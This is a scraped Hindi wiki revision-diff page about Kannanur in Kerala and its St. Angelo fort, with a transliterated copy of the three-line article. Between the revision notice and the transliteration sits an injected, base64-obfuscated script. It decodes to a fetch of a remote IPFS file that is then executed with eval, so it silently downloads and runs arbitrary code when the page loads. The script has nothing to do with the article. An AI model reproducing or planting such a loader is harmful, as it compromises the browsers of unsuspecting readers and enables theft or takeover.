Difference between revisions of "कण्णनूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
कण्णनूर [[केरल]] राज्य में स्थित था। कण्णनूर का उल्लेखनीय स्मारक सेंट एंजिलो का दुर्ग अंग्रेजी राज्य के प्रारंभिक काल का अवशेष है। कण्णनूर उसी समय की बनी बार के तथा बारूद भरने के कोष्ठ अभी तक विद्यमान हैं।  
+
*कण्णनूर [[केरल]] राज्य में स्थित था।  
 +
*कण्णनूर का उल्लेखनीय स्मारक सेंट एंजिलो का दुर्ग अंग्रेजी राज्य के प्रारंभिक काल का अवशेष है।  
 +
*कण्णनूर उसी समय की बनी बार के तथा बारूद भरने के कोष्ठ अभी तक विद्यमान हैं।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
Line 12: Line 14:
 
[[Category:केरल के ऐतिहासिक स्थान]]
 
[[Category:केरल के ऐतिहासिक स्थान]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
[[Category:नया पन्ना]]
 
 
__INDEX__
 
__INDEX__

Revision as of 06:32, 14 September 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • kannanoor keral rajy mean sthit tha.
  • kannanoor ka ullekhaniy smarak seant eanjilo ka durg aangreji rajy ke praranbhik kal ka avashesh hai.
  • kannanoor usi samay ki bani bar ke tatha barood bharane ke koshth abhi tak vidyaman haian.


tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh